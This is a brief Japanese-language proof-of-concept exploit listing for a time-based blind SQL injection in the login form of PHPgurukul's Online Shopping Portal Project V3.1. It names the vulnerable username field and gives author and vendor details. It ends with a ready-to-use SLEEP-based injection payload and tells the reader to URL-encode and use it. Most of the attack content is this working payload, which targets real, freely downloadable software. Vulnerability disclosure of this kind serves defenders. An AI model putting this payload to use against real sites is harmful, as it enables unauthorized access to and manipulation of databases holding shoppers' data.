
poc
Online Shopping Portal Project V3.1 は、ログインフォームを介してリモートの攻撃者が任意のSQLコマンド/クエリを実行することを許可し、不正アクセスやデータ操作につながる可能性があります。この脆弱性は、ユーザーが入力したusernameフィールドの検証が不十分なために発生し、SQLインジェクション攻撃を可能にします。
エクスプロイトタイトル: Online Shopping Portal Project V3.1 PHPgurukul - Time-Based Blind Sqli
エクスプロイト作成者: Akshad Joshi
ベンダーホームページ: https://phpgurukul.com
ソフトウェアリンク: https://phpgurukul.com/shopping-portal-free-download/
テスト環境: Linux
このペイロードを使用してください (URLエンコードしてください):
[email protected]' AND (SELECT 1866 FROM (SELECT(SLEEP(10)))JHcH) AND 'GMDH'='GMDH